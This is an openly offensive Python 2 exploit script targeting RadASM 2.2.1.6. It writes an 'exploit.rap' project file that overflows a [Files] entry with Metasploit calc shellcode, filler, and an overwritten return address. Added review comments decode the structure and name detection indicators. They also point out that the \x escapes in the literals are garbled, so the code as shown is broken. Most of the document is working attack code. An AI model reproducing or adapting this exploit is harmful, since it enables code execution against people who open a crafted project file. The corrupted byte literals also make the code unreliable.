# Title : Radasm v2.2.1.6 (.rap) Universal Buffer Overflow Exploit
# Published : 2010-02-11
# Author : Dz_attacker
#!/usr/bin/python
#[+] Radasm (.rap) Universal buffer overflow Exploit
#[+] Original : http://www.exploit-db.com/exploits/11392
#[+] Exploit : Dz_attacker (dz_attacker@hotmail.fr)
# Leading part of the INI-style RadASM .rap project file. Read as byte
# values, the hex pairs spell:
#   "[Project]\r\nAssembler=masm\r\nGroup=1\r\nGroupExpand=1\r\n[Files]\r\n1=AVP "
# i.e. the prefix stops mid-way through the first [Files] entry; the value of
# that entry (a file name) is where the oversized data assembled below lands.
# NOTE(review): as rendered on this page the `\x` escapes have lost their
# backslashes, so these literals are plain ASCII text, not the bytes named.
header1=(
"x5bx50x72x6fx6ax65x63x74x5dx0dx0ax41x73x73x65x6dx62x6cx65x72"
"x3dx6dx61x73x6dx0dx0ax47x72x6fx75x70x3dx31x0dx0ax47x72x6fx75"
"x70x45x78x70x61x6ex64x3dx31x0dx0ax5bx46x69x6cx65x73x5dx0dx0a"
"x31x3dx41x56x50x20")
# Trailing part of the project file, appended after the oversized [Files]
# value. The hex pairs spell the remainder of a normal RadASM project:
#   ".Asm\r\n2=AVP Over.Inc\r\n[MakeFiles]\r\n0=AVP Over.res\r\n[MakeDef]\r\n"
#   "Menu=0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0\r\n1=4,O,$B\RC.EXE /v,1\r\n..."
#   "[Group]\r\nGroup=Added files,Assembly,Resources,Misc,Modules\r\n1=1"
# Presumably kept well-formed so the rest of the file still parses — not
# verified here. Same rendering caveat as header1: the escapes are garbled.
header2=(
"x2ex41x73x6dx0dx0ax32x3dx41x56x50x20x4fx76x65x72x2ex49x6ex63"
"x0dx0ax5bx4dx61x6bx65x46x69x6cx65x73x5dx0dx0ax30x3dx41x56x50"
"x20x4fx76x65x72x2ex72x65x73x0dx0ax5bx4dx61x6bx65x44x65x66x5d"
"x0dx0ax4dx65x6ex75x3dx30x2cx31x2cx31x2cx31x2cx31x2cx31x2cx31"
"x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x2cx30x0dx0a"
"x31x3dx34x2cx4fx2cx24x42x5cx52x43x2ex45x58x45x20x2fx76x2cx31"
"x0dx0ax32x3dx33x2cx4fx2cx24x42x5cx4dx4cx2ex45x58x45x20x2fx63"
"x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx36x43x6fx67x6fx20"
"x2fx49x22x24x49x22x2cx32x0dx0ax33x3dx35x2cx4fx2cx24x42x5cx4c"
"x49x4ex4bx2ex45x58x45x20x2fx53x55x42x53x59x53x54x45x4dx3ax57"
"x49x4ex44x4fx57x53x20x2fx52x45x4cx45x41x53x45x20x2fx56x45x52"
"x53x49x4fx4ex3ax34x2ex30x20x2fx4cx49x42x50x41x54x48x3ax22x24"
"x4cx22x20x2fx4fx55x54x3ax22x24x35x22x2cx33x0dx0ax34x3dx30x2c"
"x30x2cx2cx35x0dx0ax35x3dx72x73x72x63x2ex6fx62x6ax2cx4fx2cx24"
"x42x5cx43x56x54x52x45x53x2ex45x58x45x2cx72x73x72x63x2ex72x65"
"x73x0dx0ax36x3dx2ax2ex6fx62x6ax2cx4fx2cx24x42x5cx4dx4cx2ex45"
"x58x45x20x2fx63x20x2fx63x6fx66x66x20x2fx43x70x20x2fx6ex6fx6c"
"x6fx67x6fx20x2fx49x22x24x49x22x2cx2ax2ex61x73x6dx0dx0ax37x3d"
"x30x2cx30x2cx22x24x45x5cx4fx6cx6cx79x44x62x67x22x2cx35x0dx0a"
"x5bx47x72x6fx75x70x5dx0dx0ax47x72x6fx75x70x3dx41x64x64x65x64"
"x20x66x69x6cx65x73x2cx41x73x73x65x6dx62x6cx79x2cx52x65x73x6f"
"x75x72x63x65x73x2cx4dx69x73x63x2cx4dx6fx64x75x6cx65x73x0dx0a"
"x31x3dx31")
# win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# Payload blob copied verbatim from the generator named in the line above
# (a calc.exe launcher per that comment). Its length is taken with len() at
# assembly time below, so the filler after it adapts to whatever is pasted
# here. Rendering caveat as for the headers: the escapes are garbled on this
# page, so the literal is ASCII text rather than the 343 bytes the comment
# describes.
shellcode=(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x50x4bx58x45x54x4ex43x4bx48x4ex37"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx34x4ax41x4bx58"
"x4fx55x42x52x41x50x4bx4ex49x54x4bx58x46x33x4bx38"
"x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x52x46x50x45x57x45x4ex4bx38"
"x4fx55x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx44"
"x4bx58x4fx45x4ex51x41x50x4bx4ex4bx58x4ex51x4bx38"
"x41x30x4bx4ex49x58x4ex35x46x42x46x50x43x4cx41x43"
"x42x4cx46x36x4bx48x42x44x42x33x45x58x42x4cx4ax57"
"x4ex30x4bx38x42x54x4ex30x4bx38x42x57x4ex41x4dx4a"
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx38x42x38x42x4b"
"x42x30x42x30x42x50x4bx38x4ax36x4ex43x4fx55x41x53"
"x48x4fx42x36x48x45x49x48x4ax4fx43x48x42x4cx4bx37"
"x42x55x4ax56x50x57x4ax4dx44x4ex43x57x4ax46x4ax59"
"x50x4fx4cx48x50x30x47x55x4fx4fx47x4ex43x56x41x56"
"x4ex36x43x56x42x30x5a")
# Assemble the .rap contents. Layout, in order:
#   header1 | 2 filler bytes | shellcode | filler up to a fixed 1809-byte
#   region | 3 more filler bytes | two short byte sequences | a 4-byte value
#   the author labels "univ ret" (the overwritten return address) | header2
# Everything between header1 and header2 sits in the value of the single
# [Files] entry "1=" — roughly 1.8 KB where a file name belongs. From a
# detection standpoint that is the indicator: a .rap whose [Files] value is
# far longer than any plausible path, or contains non-printable bytes, is
# malformed and worth flagging.
buffer = header1
buffer += "x41"*2
buffer += shellcode
# len(shellcode) is evaluated at run time, so the total payload region stays
# 1809 bytes regardless of the blob pasted above.
buffer += "x41"*(1809-len(shellcode))
buffer += "x61"*3
buffer += "xFFxD0"
buffer += "xEBxF9x90x90"
buffer += "x55x25x40x00" #univ ret
buffer += header2
# Write the assembled contents to exploit.rap in the current directory.
# Python 2 syntax (print statement; str buffer written in text mode).
# NOTE(review): the bare `except:` swallows every error — a failed open() or
# write() prints only the generic message and the real exception is lost;
# `except IOError as e:` with the error included would be the minimal fix.
# The handle is closed explicitly rather than via `with`, so a failed write
# also leaves it open until interpreter exit. The trailing "n" in the success
# message looks like a lost "\n" escape, consistent with the garbled literals
# above.
try:
rap = open("exploit.rap",'w')
rap.write(buffer)
rap.close()
print "Exploit file created!n"
except:
print "Error occured!"